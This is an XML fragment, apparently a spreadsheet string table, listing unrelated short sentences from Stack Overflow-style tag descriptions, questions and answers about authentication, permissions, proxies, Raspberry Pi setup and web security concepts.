    <t>I'm attempting to determine platform differences that can be contributing to my problems, this question focuses mkfifo and netcat permissions and possible differences between how these programs behave across platforms.</t>
  </si>
  <si>
    <t>It is important to highlight, that even though the API is not an official Google API, in most ways it is very stable and well known (it is used by the official Reader sites and clients) and behaves like a public API in terms of the Google authentication system.</t>
  </si>
  <si>
    <t>This tag should be used with questions about the safari-content-blocker extension (iOS and OS X).</t>
  </si>
  <si>
    <t>It was never intended to be a "safe version of strcpy" but is often misused for such purposes.</t>
  </si>
  <si>
    <t>See I want to delete the [internet] and Blacklist the whole [internet]</t>
  </si>
  <si>
    <t>You are sending just too many messages one after another to Arduino, so what happens is that when it invokes readString() it takes a very long string, and increments  past the legitimate interval 0..2, which means that you are corrupting the memory stack and from there anything can happen.</t>
  </si>
  <si>
    <t>Content scripts interact with a webpage via the DOM API, and they frequently have enhanced privileges and access to privileged browser-API functions compared to ordinary webpage javascript.</t>
  </si>
  <si>
    <t>If root user require than plz tell me what is root user and how to logged into root user in raspberry pi3 via SSH?plz help me.Thanks in advance.</t>
  </si>
  <si>
    <t>So for now the user needs to insert also the password and login for the stream but is it possible to handle that automatically by PHP that I say that the username is admin and the password is 1234, So that the user not need to do 2 logins?</t>
  </si>
  <si>
    <t>Recent versions introduced anonymous predicates and generics.</t>
  </si>
  <si>
    <t>Terms of service can also be merely a disclaimer, especially regarding the use of websites.</t>
  </si>
  <si>
    <t>Questions, comments or issues regarding using FusionAuth or implementing FusionAuth</t>
  </si>
  <si>
    <t>Safari 10 onwards
Safari 10+ comes with bundled Safari WebDriver
Pre Safari 10
SafariDriver is implemented as a Safari browser extension.</t>
  </si>
  <si>
    <t>Questions, comments or issues regarding using FusionAuth or implementing FusionAuth (https://fusionauth.io)</t>
  </si>
  <si>
    <t>This tag should be used:
for questions about how permissions work in a particular systems;
for scenarios/problems that involves permissions in a substantial way.</t>
  </si>
  <si>
    <t>For example, the Arduino Ethernet library has only this reference to demonstrate how to connect your board to the Internet but no clue how to do it across firewall proxies, etc.</t>
  </si>
  <si>
    <t>I could not find any crypto library in Arduino standard libraries.</t>
  </si>
  <si>
    <t>I gave root access to all the files and folders with my code in it and even was logged in as root user when I ran the program and still got the same error.</t>
  </si>
  <si>
    <t>I have www page, where is possible create user registration and users can log into this page.</t>
  </si>
  <si>
    <t>You may also need to use xhost + to grant permission to the root user (assuming the web server is running as root).</t>
  </si>
  <si>
    <t>If you have root privilege, consider build a statically linked  so you have lsusb on Android.</t>
  </si>
  <si>
    <t>`pipes` is a group of libraries written in Haskell to provide safe, functional, and strict I/O.</t>
  </si>
  <si>
    <t>Krypton toolkit is a free .Net library of user interface controls and components.</t>
  </si>
  <si>
    <t>Forms Authentication is a built-in and extensible system for authenticating users in an ASP.Net application that also maintains that authenticated session via a ticket (often stored as a cookie or query string parameter).</t>
  </si>
  <si>
    <t>Virtual store is a concept in Windows (Vista and newer) where unprivileged writes to system and program files/directories (as well as registry changes) are redirected transparently to a directory located inside the application data folder of each user (usually located at %localappdata%\VirtualStore).</t>
  </si>
  <si>
    <t>On the website there is a basic form that has two fields one for password and one for username, it also has a submit button labelled login.</t>
  </si>
  <si>
    <t>My question is that : What could possibly make pamd allow remote root login and sometimes deny it.</t>
  </si>
  <si>
    <t>I assume that a lockless implementation would be very cool but at this time I feel not confident enough on ARM to implement this from scratch.</t>
  </si>
  <si>
    <t>I have filled this in in open text like a noob and ignored this thing:
  my $auth = "Basic " .</t>
  </si>
  <si>
    <t>Solution is to run with admin privileges:
 will put the libraries in /usr/local/lib</t>
  </si>
  <si>
    <t>Zend Optimizer (now Zend Guard Loader) was created to decrypt PHP files encrypted by Zend Studio/Zend Guard.</t>
  </si>
  <si>
    <t>When activated, it will prevent user activity with the page (or part of the page) until it is deactivated.</t>
  </si>
  <si>
    <t>This tag should be used for any questions to do with programmatically pre-authorizing/authorizing/refunding transactions using Datacash's API.</t>
  </si>
  <si>
    <t>Useful links
ASP.NET Identity
Bug reports and discussions</t>
  </si>
  <si>
    <t>cookielib.DefaultCookiePolicy: implements the standard accept and reject rules for Netscape and RFC 2965 cookies.</t>
  </si>
  <si>
    <t>Java security technology is set of libraries, tools, and implementations of commonly used security algorithms, mechanisms, and protocols.</t>
  </si>
  <si>
    <t>Please have a look at the following StackOverflow questions that detail this:-
How to encrypt data using BLE connection using Bluez5.50
Should one create a bond with a Bluetooth LE device
Finally, I would recommend sending such non-programming questions on other sites (e.g.</t>
  </si>
  <si>
    <t>Mozilla Firefox synchronization feature that allows users to partially synchronize bookmarks, browsing history, preferences, passwords, filled forms, add-ons, and opened tabs across multiple computers.</t>
  </si>
  <si>
    <t>Authority differs from other authorization gems in that:
It allows defining authorizations using classes and normal inheritance mechanisms
It is completely decoupled from authentication
It is completely decoupled from the database or ORM
More info and examples can be found in the README: https://github.com/nathanl/authority</t>
  </si>
  <si>
    <t>The bosch-iot-suite tag can be used for any of the managed suite services and related on-premises or edge software:
- Bosch IoT Analytics
- Bosch IoT Things
- Bosch IoT Hub
- Bosch IoT Permissions
- Bosch IoT Remote Manager
- Bosch IoT Insights
- Bosch IoT Gateway Software
Questions about 
Open source Eclipse IoT projects should use the respective tags such as eclipse-iot eclipse-hawkbit or eclipse-ditto 
Bosch sensors and other hardware, such as the Bosch XDK should use bosch-iot.</t>
  </si>
  <si>
    <t>I am looking to develop the raspberry pi into something that I would be able to run a free use public web terminal which would be locked to a certain domain.</t>
  </si>
  <si>
    <t>I have a little Raspberry Pi server set up, using Nginx and Raspbian, and I downloaded a PHP script to serve as a login handler, except that I can't seem to connect to my MySQL database.</t>
  </si>
  <si>
    <t>That's working perfectly but when I try to connect with a Android or iOS smartphone it detects it as a captive portal and the page is displayed but within an authentication popup.</t>
  </si>
  <si>
    <t>Because I have the same problem and HackToHell asked to continue on AskUbuntu chat which is not available anymore
Actually i could find my device on Bluetoothctl, i trusted it once and i could see it everytime, but for now that it is untrusted, i can only see it with btmon, that is painful haha.</t>
  </si>
  <si>
    <t>But, i can only get the data after I start chrome with this command:
"chrome.exe --user-data-dir="c:/chrome dev session" --disable-web-security"
So then i need to go manually to the webserver and accept the self signed certificate.</t>
  </si>
  <si>
    <t>In my Mac, I go to settings, network , advanced, Proxies and then Automatic proxy configuration and enter the proxy location, then it works on my system.</t>
  </si>
  <si>
    <t>There are many links on the internet but the closest solution so far, is the link written in C which tries to scan for BLE devices.</t>
  </si>
  <si>
    <t>A third option is to insert a reverse-proxy able to convert Basic Auth to Windows Auth, e.g.</t>
  </si>
  <si>
    <t>If you are certain that you can access your site from inside your LAN, the problem may have to do with your router/firewall setup to proxy to your RaspberryPi server.</t>
  </si>
  <si>
    <t>Apparently, the Safari browser was looking at the incoming cookie, seeing that its expiration date (now + 1 hr) was in the past, and since it was expired, not storing it.</t>
  </si>
  <si>
    <t>It turns out my suspicion was right - the problem was solved by adding a UA proxy that translated the OPC-UA to OPC Classic, allowing the explorer to detect and access the server.</t>
  </si>
  <si>
    <t>This pass-phrase mapping was introduced to encourage users unfamiliar
  with cryptographic concepts to enable the security features of their
  WLAN.</t>
  </si>
  <si>
    <t>You certainly want to look into addressing specific endpoints such as the device to cloud messaging one and into the authentication mechanisms linked from this doc as well.</t>
  </si>
  <si>
    <t>If I understood you correctly, you are trying to use the acknowledgement mechanism offered by Socket.IO (I inferred this from the tags of your question).</t>
  </si>
  <si>
    <t>About the kill from another terminal, the command kill -9 and the pid of the process should always work because SIGKILL can't be ignored nor caught.</t>
  </si>
  <si>
    <t>Certificates created using CloudFormation (Via a CSR) can be retrieved via the following ways
Aws IoT webpage
Just navigate to Security - Certificates, click on  and select Download.</t>
  </si>
  <si>
    <t>Type safe enums, introduced in c++11 to prevent automatic conversion to int types.</t>
  </si>
  <si>
    <t>Evercookie accomplishes this by storing the cookie data in several types of storage mechanisms that are available on the local browser.</t>
  </si>
  <si>
    <t>With Chrome Profiles, you can keep all your Chrome info separate, like bookmarks, history, passwords, and other settings.</t>
  </si>
  <si>
    <t>This tag should be used in questions about the Client and Trusted Applications development, or about development and debugging environment setup.</t>
  </si>
  <si>
    <t>Session cookies enable a server and a browser to establish an identified connection (through cookies) and communicate though it.</t>
  </si>
  <si>
    <t>Rings are arranged in a hierarchy from most privileged (most trusted, usually numbered zero) to least privileged (least trusted, usually with the highest ring number).</t>
  </si>
  <si>
    <t>DEP provides some protection against attacks but, like any other individual security feature, DEP alone is not sufficient to protect against all forms of attack.</t>
  </si>
  <si>
    <t>Pages locked in this manner are exempt from paging until the pages are unlocked or the process exits.</t>
  </si>
  <si>
    <t>Fiddler is freeware and can debug traffic from virtually any application that supports a proxy, including Internet Explorer, Google Chrome, Apple Safari, Mozilla Firefox, Opera, and thousands more.</t>
  </si>
  <si>
    <t>phpseclib is a PHP library that provides pure-PHP implementations of:
BigIntegers
RSA
SSH1
SSH2
SFTP
SCP
ASN1
X.509
Symmetric key encryption
AES
Rijndael
DES
3DES
RC4
Blowfish
Twofish
Repository at GitHub: https://github.com/phpseclib/phpseclib</t>
  </si>
  <si>
    <t>(tag: hmac)
Related Questions
What are the important points about cryptographic hash functions?</t>
  </si>
  <si>
    <t>An ISP provide services such as Internet access, Internet transit, domain name registration and hosting, dial-up access, leased line access and collocation.</t>
  </si>
  <si>
    <t>Usage:
The tag isp can be used for programming problems related to services like Internet, Firewall, Leased line access and others that are provided by ISPs.</t>
  </si>
  <si>
    <t>It is a packaging of portable OpenSSH, Cygwin, some popular utilities, plus implementation of some best practices regarding security.</t>
  </si>
  <si>
    <t>Ability to configure interceptors via the App/Web.config file
(allowing interceptors to be added without recompiling the
application).</t>
  </si>
  <si>
    <t>These methods are guaranteed to be portable as a part of the standard library, but may have other limitations or security concerns.</t>
  </si>
  <si>
    <t>You can retrieve all details, or you can retrieve details of a specific type, such as all email addresses.</t>
  </si>
  <si>
    <t>Internet Explorer provides a number of preset security settings that allow you to set the protection level that you feel is appropriate.</t>
  </si>
  <si>
    <t>Two language handlers, one TRUSTED (the default) and one that is not TRUSTED (language tag is javaU to conform with the defacto standard).</t>
  </si>
  <si>
    <t>Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007.</t>
  </si>
  <si>
    <t>All questions of this site should concern either:
the use of the HTTP APIs exposed by Kinto;
the deployment and configuration of a Kinto server;
the code that runs behind the scenes, and how to extend it.</t>
  </si>
  <si>
    <t>PHP Tutorials
PHP Basics
PHP security related information
PHP Security Cheat Sheet, by OWASP (Marked for deletion since aug-2018, document available here.</t>
  </si>
  <si>
    <t>hash-code-uniqueness is used in its general meaning, so you are advised to use one or more additional tags to best describe your specific case.</t>
  </si>
  <si>
    <t>and other websites across the Internet made much of their structured data available to developers, primarily through Web services.</t>
  </si>
  <si>
    <t>On websites and other web-based services passwords are used to make sure that anyone trying to connect to the site or service is who they say they are.</t>
  </si>
  <si>
    <t>The Boost module is a module that provides caching for static pages, and it is thought for sites that receive most of the traffic from anonymous users (i.e.</t>
  </si>
  <si>
    <t>If you want to unlock a Pi with NFC tag I guess that you will have to use a PAM NFC module (see here http://nfc-tools.org/index.php?title=Pam_nfc)
If you want to unlock a PC using a NFC with a reader connected to the PC tag see below: 
The windows authentication architecture is described here: https://technet.microsoft.com/en-us/library/dn169016(v=ws.10).aspx
Basically you will have to implement a "Custom Credentials Provider" and a LogonUI.</t>
  </si>
  <si>
    <t>The user profile is a section, page or tab, used to manage and display a set of personal information of a certain user.</t>
  </si>
  <si>
    <t>when application launches, if user has logged in before with the app, he/she will not be prompted to input username and password again but will be directly logged in</t>
  </si>
  <si>
    <t>It handles the common tasks of logging in, logging out, and remembering your users' sessions over extended periods of time.</t>
  </si>
  <si>
    <t>It also includes sessions, internationalization, domain and subdomain routing, secure cookies and support for threaded environments.</t>
  </si>
  <si>
    <t>The Global Interpreter Lock (GIL) is a CPython implementation detail that ensures thread safety by disallowing concurrent execution of Python code.</t>
  </si>
  <si>
    <t>The API library provides a fully-featured SSH2 implementation specifically designed for cross-platform development.</t>
  </si>
  <si>
    <t>redbird.register('localhost', 'http://localhost:8082', {ssl: true});
3) Test it:
Point your browser to localhost:8000 and you will see how it automatically redirects to your HTTPS server and proxies you to 
your target server.</t>
  </si>
  <si>
    <t>Official Website: http://projects.spring.io/spring-security-saml/
Useful links:
Sources
Documentation
Jira
Continuous integration
Releases
Online demo</t>
  </si>
  <si>
    <t>Some routers cannot handle their Internet facing IP being accessed from inside the LAN.</t>
  </si>
  <si>
    <t>For security questions that are not specific to coding, consider looking at Information Security Stack Exchange.</t>
  </si>
  <si>
    <t>So my question is why is iOS behaving this way, what is blocking it and making the browser think it has no internet connection?</t>
  </si>
  <si>
    <t>https://github.com/kreait/firebase-php is a library that provides service account based authentication, your code would look something like this:
Disclaimer: I'm the creator of that library :)</t>
  </si>
  <si>
    <t>Privileged applets can run outside the security sandbox and have extensive capabilities to access the client.</t>
  </si>
  <si>
    <t>http://localhost/phpinfo.php
Remember to delete it afterwards for security reasons.</t>
  </si>
  <si>
    <t>Session cookies are temporary files that exist for a particular user for a pre-defined duration.</t>
  </si>
  <si>
    <t>While rotating keys is commonly recommended, the ability to rotate keys inherently introduces a vulnerability-- a bad actor could theoretically rotate in a new key of their choosing to gain control of the system, since the mechanism exists to replace the key.</t>
  </si>
  <si>
    <t>Input Box: (Allows for user input)
whiptail --inputbox "Tell us your thoughts"
Password Box: (Masks user input)
whiptail --passwordbox "Enter a password"
Menu: (Present users with a list of options)
whiptail --menu "Choose an option [Dialog Height] [Dialog Width] [Menu Height] \
Apple A red fruit \
Pineaaple A tropical fruit \
Watermelon A Summer Fruit"
For more information please visit
https://en.wikibooks.org/wiki/Bash_Shell_Scripting/Whiptail</t>
  </si>
  <si>
    <t>I've been active in chat moderation as a Room Owner for SOCVR (user-level moderation) and Charcoal HQ (fight spam &amp; R/A).</t>
  </si>
  <si>
    <t>Here what I've done :
from the result : The owner is root and the
group with access is dialout
Then I applied:
sudo usermod -a -G dialout &lt;username&gt;
sudo chmod a+rw /dev/ttyACM0 
Finally logged out and logged in.</t>
  </si>
  <si>
    <t>You can uniquely assign an id/pwd to each device, and BASIC authentication is well supported by all web servers and client side libraries.</t>
  </si>
  <si>
    <t>For scan-code mappings you can visit following sites:
Keyboard scancodes
Scan Codes Demystified</t>
  </si>
  <si>
    <t>If you put the banner ssh_banner.sh under /etc/profile.d then the banner is sourced through normal login process and has nothing to do with sshd.</t>
  </si>
  <si>
    <t>Use this tag for questions regarding the usage of Ansible Vault for protecting data for playbooks and roles.</t>
  </si>
  <si>
    <t>Understand that spammers read this site and so divulging methods for bypassing somebody's spam filters is comparable to sabotage.</t>
  </si>
  <si>
    <t>This will fail if nobody is logged in at the time, and might bring up oddities on a colleague's display if somebody is logged in on the first display, but it's not you.</t>
  </si>
  <si>
    <t>I have worked out most of the issues such as closing the browser, right-clicking, keyboard shortcuts, and secure login for admins.</t>
  </si>
  <si>
    <t>Raspberry pi is hardly a speed daemon and the program needs to be executed with root privileges that the SPI library requires.</t>
  </si>
  <si>
    <t>Clicking on it, followed by Get Started, shows me a page to select an SDK for registration.</t>
  </si>
  <si>
    <t>Everything works as expected except for one aspect: the interpreter needs to run as root because some of the HCI commands (communication with the bluetooth controller) needs root privileges; otherwise, socket.send(...) will raise PermissionError.</t>
  </si>
  <si>
    <t>Try launching the command with elevated privilege 
alternatively you should write this to a .sh file ie a shell script and run it with elevated permissions as said in the resource you provided.</t>
  </si>
  <si>
    <t>Note that this may be seen as circumventing the captive portal
  network's usage or security policies, so please check with the network
  operator.</t>
  </si>
  <si>
    <t xml:space="preserve">
Do you make safe and unsafe version of your functions or just stick to the safe version?</t>
  </si>
  <si>
    <t>An adversary may be able to craft malicious code to compromise the confidentiality and/or integrity of differently trusted code/data, enabling exploitation of elevated permissions.</t>
  </si>
  <si>
    <t>In the world of android (which runs on an Linux kernel), a rooted device is one where OS protections have been disabled, allowing processes to run as root, and thus do things they would normally be prevented from doing, such as reading all files on the device.</t>
  </si>
  <si>
    <t>Many version-control systems have an "ignore"-file mechanism that specifies files that should not be committed or tracked in version control.</t>
  </si>
  <si>
    <t>I have also found this but not sure if it's possible to expose it online and then pull the jekyll page from my domain (like CNAME and dns config on domain in case of GitHub.io).</t>
  </si>
  <si>
    <t>like this: http://user:password@domain.com/directory I get the following warnung:
[Deprecation] Subresource requests whose URLs contain embedded credentials (e.g.</t>
  </si>
  <si>
    <t>&lt;?php
// Settings
// host, user and password settings
$host = "localhost";
$user = "logger";
$password = "123456";
$database = "temperatures";
//how many hours backwards do you want results to be shown in web page.</t>
  </si>
  <si>
    <t>Implemented proxy as mention in below code but doubt that this code is not respecting proxy settings and upload still fails.</t>
  </si>
  <si>
    <t>I come to think of several solutions; basically you would want your php-page to parse the data and create a trusted output that can be printed (i.e.</t>
  </si>
  <si>
    <t>So unless the client code youre sending data from on the Arduino is running in a browser, you dont need to worry about any cross-origin restrictions prevent you from doing anything.</t>
  </si>
  <si>
    <t>In Google Apps domains, the domain administrator can grant to third party applications domain-wide access to its users' data  this is referred as domain-wide delegation of authority.</t>
  </si>
  <si>
    <t>Step 1: Prepare your Raspberry and install a  server:
Step 2: Install LETSENCRYPT:
cd ~
git clone https://github.com/letsencrypt/letsencrypt
cd letsencrypt
./letsencrypt-auto -d DDNSNAME_ROUTER --redirect -m EMAILADDRESS
During the installation process you will be asked some questions.</t>
  </si>
  <si>
    <t>Flooding is a type of Denial of Service(DoS) network attack, which consists of the generation of numerous TCP requests intended to overwhelm a web server and result in slowdown or downtime.</t>
  </si>
  <si>
    <t>Partial trust is a .NET security model in which application code executes with reduced permissions as a measure of protecting the local system from malicious use.</t>
  </si>
  <si>
    <t>XSS enables attackers to inject client-side script into web pages viewed by other users.</t>
  </si>
  <si>
    <t>Application layer security design, implementation, vulnerability assessments and concerns, as opposed to infrastructure (e.g., ACLs on routers, IDSes, etc.)</t>
  </si>
  <si>
    <t>Hyperledger Sawtooth is an implementation of blockchain technology with the Proof of Elapsed time algorithm by default, use this tag for questions about this project.</t>
  </si>
  <si>
    <t>Use this tag when discussing adding payment details to meet Strong Customer Authentication requirements.</t>
  </si>
  <si>
    <t>Questions related to the process of gaining root access to a mobile device for the purpose of software and OS modification.</t>
  </si>
  <si>
    <t>It uses a sophisticated security concept and aims to generate fully valid HTML 5 markup by preventing unmaintainable tag soups and inline styles.</t>
  </si>
  <si>
    <t>JTS uses the CORBA OTS interfaces for interoperability and portability, which defines
a standard mechanism for any implementation that utilizes IIOP (Internet InterORB
Protocol) to generate and propagate transaction context between JTS Transaction
Managers.</t>
  </si>
  <si>
    <t>Sites can use X-Frame-Options to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites.</t>
  </si>
  <si>
    <t>The proxy must return a Proxy-Authenticate header field containing a challenge applicable to the proxy for the requested resource.</t>
  </si>
  <si>
    <t>Paths may be registered for URL handling only, or they can register a link to be placed in a menu (usually the Navigation menu).</t>
  </si>
  <si>
    <t>For example, WiX can install IIS web sites, create SQL Server databases, and register exceptions in the Windows Firewall, among others.</t>
  </si>
  <si>
    <t>Even then, be aware that Cube is not yet hardened against denial-of-service attacks and other malicious requests, and is still in the early stages of development.</t>
  </si>
  <si>
    <t>Windows and programs (such as web browsers) can securely give the credentials in the vaults to other computers and websites.</t>
  </si>
  <si>
    <t>About Trusted Sites
It is important to protect your computer from unsafe content on malicious websites.</t>
  </si>
  <si>
    <t>The signs include too many password failures, requesting admin pages, seeking for exploits, etc.</t>
  </si>
  <si>
    <t>XSS enables attackers to inject client-side script into Web pages viewed by other users.</t>
  </si>
  <si>
    <t>There are two kinds of interceptors (and two kinds of rejection interceptors):
: interceptors get called with a http config object.</t>
  </si>
  <si>
    <t>Here are some of the things you can do with the API: 
Request a site verification token to place on user's domains or websites.</t>
  </si>
  <si>
    <t>The browser issuing polices are provided by the CA/Browser Forum (CA/B Forum), and explains why browsers reject certificates that OpenSSL, Wget and other free software accept.</t>
  </si>
  <si>
    <t>Trust level refers to permissions set in the Web.config file that dictate what operations can and cannot be performed by Web applications.</t>
  </si>
  <si>
    <t>HTML Purifier is a comprehensive, customisable php library for filtering user-input or WYSIWYG editor html, returning valid HTML safe from xss attacks.</t>
  </si>
  <si>
    <t>It is the underlying mechanism that allows CPython as a whole to be thread-safe, despite parts of the interpreter such as garbage collection not being thread safe.</t>
  </si>
  <si>
    <t>Question related to the .net Thread implementation about the current principal for role-based security.</t>
  </si>
  <si>
    <t>As such, it can be used as a tool both by systems administrators (to find and secure vulnerabilities on their systems), or by attackers (to find vulnerabilities to exploit).</t>
  </si>
  <si>
    <t>An HTA executes without the constraints of the internet browser security model; in fact, it executes as a "fully trusted" application.</t>
  </si>
  <si>
    <t>In the BIOS UI, a user can:
configure hardware
set the system clock
enable or disable system components
select which devices are eligible to be a potential boot device
set various password prompts, such as a password for securing access to the BIOS user interface functions itself and preventing malicious users from booting the system from unauthorized peripheral devices.</t>
  </si>
  <si>
    <t>Users can allow active content to execute on trusted websites, by giving explicit permission, on a temporary or a more permanent basis.</t>
  </si>
  <si>
    <t>The software is therefore immune to cache-timing attacks, hyperthreading attacks, and other side-channel attacks that rely on leakage of addresses through the CPU cache.</t>
  </si>
  <si>
    <t>If you go the -build-it-yourself route, check out this post on electronics.SE: apparently there is a cryptography library for AVR, and also useful list of attacks to consider in the electronics.SE post: are you worried only about MitM attack?</t>
  </si>
  <si>
    <t>WiFiManager requires you to:
Connect to ESP8266's AP
Go to 192.168.4.1 (or any other set address) - on iOS it should appear automatically
Click on Wifi scan
Choose the network you want your ESP8266 to connect to
Provide password if any
Click Save button
This is the minimal thing a user has to do.</t>
  </si>
  <si>
    <t>WinPcap is the industry-standard tool for link-layer network access in Windows environments: it allows applications to capture and transmit network packets bypassing the protocol stack.</t>
  </si>
  <si>
    <t>&lt;select multiple="multiple" name="myselect[]"&gt;...&lt;/select&gt;
Pre-Selecting an Option
Pre-selection is handy for providing a default option that the average user would select or that the system recommends being used (such as a privacy setting).</t>
  </si>
  <si>
    <t>The connection details for communicating with the Google Cloud IoT Core MQTT bridge are discussed in detail in the documentation but the important connection properties you will need to be aware of are the hostname (mqtt.googleapis.com) port (8883 or 443) and the MQTT password / client ID which are going to be based on the devices you've provisioned for the service.</t>
  </si>
  <si>
    <t>This means that it works like a bridge between normal browsers and the Ethereum blockchain.</t>
  </si>
  <si>
    <t>Facebook Page: A Facebook Page will be used as the identity of your bot.</t>
  </si>
  <si>
    <t>This enables apps to automatically work even if the user is connected to the internet through a proxy.</t>
  </si>
  <si>
    <t>This tag should be used for programming questions involving interacting with VeraCrypt.</t>
  </si>
  <si>
    <t>In the case where an external DNS server is not made available using Internet Connection Sharing (see the discussion of ICS below), fully qualified domain name (FQDN) resolution between any two computers or devices connected with the SoftAP, including the computer hosting the SoftAP, would only work if both entities mark the network type of the SoftAP network as PRIVATE (HOME or WORK in the network category pop-up).</t>
  </si>
  <si>
    <t>WS-Trust defines a number of new elements, concepts and artifacts in support of that goal, including:
the concept of a Security Token Service (STS) - a web service that
issues security tokens as defined in the WS-Security specification.</t>
  </si>
  <si>
    <t>This allows developers to make explicit decisions to trust a string as safe where they have the context, and rely on the browser to double-check that a string was so marked before treating it as safe per the same-origin-policy.</t>
  </si>
  <si>
    <t>This tag is for questions that involve black box security testing of applications and/or networks.</t>
  </si>
  <si>
    <t>Not for questions regarding documentation, licencing or other legal issues.</t>
  </si>
  <si>
    <t>It differs from other Internet Message Access Protocol (IMAP) server implementations in that it is generally intended to be run on sealed servers, where normal users cannot log in.</t>
  </si>
  <si>
    <t>SEB for macOS
In contrast to the Windows version, Safe Exam Browser for Mac OS X is a monolithic application using a web browser framework instead of a browser runtime.</t>
  </si>
  <si>
    <t>It is used over generic interfaces like ODCB because it allows access to Oracle database specific features like connection pooling, security access, and data types.</t>
  </si>
  <si>
    <t>Added 'ssh' file to _root of SD card so I can connected via Putty/FTP..etc
Update Repositories:
-- sudo apt-get update
* Install Apache:
-- sudo apt install apache2   //new line
* Give permissions to Pi:
-- sudo chown -R pi:www-data /var/www/html/
-- sudo chmod -R 770 /var/www/html/
* Change Default Web Page:
-- ls -al
** I test if the server is working by opening the web browser and typing the Raspberry Pi's IP address.</t>
  </si>
  <si>
    <t>sudo command should protect the root account to avoid to run scripts written by user to gain root privilege.</t>
  </si>
  <si>
    <t>Sites use client side javascript to get an assertion from the browser which vouches for the ownership of an email address.</t>
  </si>
  <si>
    <t>I get this in some url:
my.domain/appname -&gt; codeigniter welcome for public (this part is empty so I think is OK)
my.domain/appname/admin/login.html -&gt; Not Found.</t>
  </si>
  <si>
    <t xml:space="preserve">
should be after
and  ather actions like update ...
looks like its deleted but you see old data :)
&lt;?php
    $servername="localhost";
    $username="root";
    $password="patate";
    $dbname="testbase";
    $table="matable";
    $conn = new mysqli($servername,$username,$password,$dbname);
    if ($conn-&gt;connect_error) {
            echo "kaput";
            die("Connection failed: " .</t>
  </si>
  <si>
    <t>If you already have a shell on the Pi through a non-SSH method such as screen + keyboard or UART (see below), just run:
as explained at: https://raspberrypi.stackexchange.com/questions/58478/ssh-not-working-with-fresh-install This persists across boots.</t>
  </si>
  <si>
    <t>In this example we of course assume that you've got a servlet which puts the logged-in user in the HTTP session by session.setAttribute("user", user) whenever the login form is submitted.</t>
  </si>
  <si>
    <t>Porting Lockbox-2 to Lockbox3 or other modern encrypting libraries is not always straightforward, like mentioned for example at http://lockbox.seanbdurkin.id.au/tiki-view_forum_thread.php?comments_parentId=410
There is tag "Lockbox-3" but using it when the question touches issues specific for v.2 is just confusing</t>
  </si>
  <si>
    <t>The usual reason for using a CAPTCHA is to prevent automated spam from being posted into a public discussion forum or similar site.</t>
  </si>
  <si>
    <t>When trying to compile my program I get a ton of errors to do with the wificlientsecure library but from my understanding this is a default library with the framework so I am confused as to why this is happening.</t>
  </si>
  <si>
    <t>Note that this latter approach, re-implementing the ICMP handling in pure Python, entails running your Python code as root (on Unix/Linux) or with "Administrator" privileges in MS Windows.</t>
  </si>
  <si>
    <t>It serves the same purpose as Apache's ProxyPassReverse directive does for HTTP headers, and is an essential component of a reverse proxy.</t>
  </si>
  <si>
    <t>Even if some way of terminating connection from peripherial is made possible, the malicious central will keep reconnecting hence essentially performing DENIAL OF SERVICE(DOS) attack.</t>
  </si>
  <si>
    <t>The problem I've run into is that the website, that is not under my control, has links to outside websites that I don't want our users going to check the present URL make sure that it is the one approved URL and redirect if it isn't.</t>
  </si>
  <si>
    <t>Error:efb4de login:wlan0:link is not ready
       [ 681.580131]brcmfmac:power management diasabled
The above one is seen in monitor of RPi3
The below are the links I have followed for Installing Balena CLI and Balena OS:
[https://www.balena.io/os/docs/raspberrypi3/getting-started/][1]
[https://www.balena.io/docs/learn/getting-started/raspberrypi3/python][1]/</t>
  </si>
  <si>
    <t>You connect to that local network (it has no internet) and the app sends you to a local website running in the RPi that shows the available networks so you can select one, provide the password and continue.</t>
  </si>
  <si>
    <t>Anti-cheating in software and video-gaming aims to prevent tactics such as add-ons or exploits that give players an unfair advantage.</t>
  </si>
  <si>
    <t>"A distributed denial of service attack (DDoS) occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers."</t>
  </si>
  <si>
    <t>You can use this tag for questions about how the public specifier controls (or fails to control) access to the members of a class, and questions on how it interacts with the other access specifiers.</t>
  </si>
  <si>
    <t>Zend_Session helps manage and preserve session data, a logical complement of cookie data, across multiple page requests by the same client.</t>
  </si>
  <si>
    <t>The scripting also allows use of remote scripting, a technique by which the DHTML page requests additional information from a server, using a hidden frame, XMLHttpRequests, or a Web service.</t>
  </si>
  <si>
    <t>this technique also known as stealth, basically consist to deliver one page to a search engine for indexing while serving an entirely different page to everyone else.</t>
  </si>
  <si>
    <t>I have some experience in a number of other tags too, as well as basic sysadmin experience which I've used to raise flags to prevent inappropriate migrations to Server Fault in particular.</t>
  </si>
  <si>
    <t>I have some questions:
1) the internet key which the SIM belongs to comes with a software you have to use to connect to the internet: each time you want to connect you press CONNECT and when you are finished you press DISCONNECT.</t>
  </si>
  <si>
    <t>Check your proxy settings if any (Tools--&gt;Internet Options--&gt;Connections--&gt;LAN Settings in IE8, don't have any other browsers available to me right now), there may be more to it than just a firewall.</t>
  </si>
  <si>
    <t>Possibly your internet provider is running a 'transparent proxy' that is interfering with apt-get 
https://askubuntu.com/questions/474549/got-nodata-issue-nodata-does-the-network-require-authentication</t>
  </si>
  <si>
    <t>This part of the APN is mandatory
Operator Identifier : Defines the specific operators packet domain network in which the GGSN is located.</t>
  </si>
  <si>
    <t>This tag should be used for questions related to using software to interact with microphones in smart phones, desktops, laptops or other electronic devices.</t>
  </si>
  <si>
    <t>Jeff Preshing's An Introduction to Lock-Free Programming is a good starting point, especially in c/c++ using stdatomic (see that tag wiki for more links).</t>
  </si>
  <si>
    <t>A vote for me is a vote for someone:  
with a proven community contribution (more than 6 years)
who is nice to new users and understands where they're coming from  
but who also knows where to draw the line and protect the integrity of the site  
who can chew through a lot of flags  
and can also spend time moderating the chat rooms  
I'm in the Asia-Pacific region, so I can clear flags while our US and European friends sleep
My comprehensive Meta.SO and Meta.SE activity means I know how the place works.</t>
  </si>
  <si>
    <t>The Open Web Application Security Project (OWASP), an online community, produces freely-available articles, methodologies, documentation, tools, and technologies in the field of web application security.</t>
  </si>
  <si>
    <t>Even though far fewer invalid form requests are to be expected, invalid ones can still be sent by non-compliant browsers (for instance, browsers without HTML5 and without JavaScript) or by bad guys trying to trick your web application.</t>
  </si>
  <si>
    <t>My idea is to get the access to my raspberry server (ssh, webmin, deluge web)  from the Internet.</t>
  </si>
  <si>
    <t>I checked the Intel website and went through a few other links too.</t>
  </si>
  <si>
    <t>I need to connect a Raspberry Pi to proxy, and after everything that I've tried, it can't connect to the internet via the proxy.</t>
  </si>
  <si>
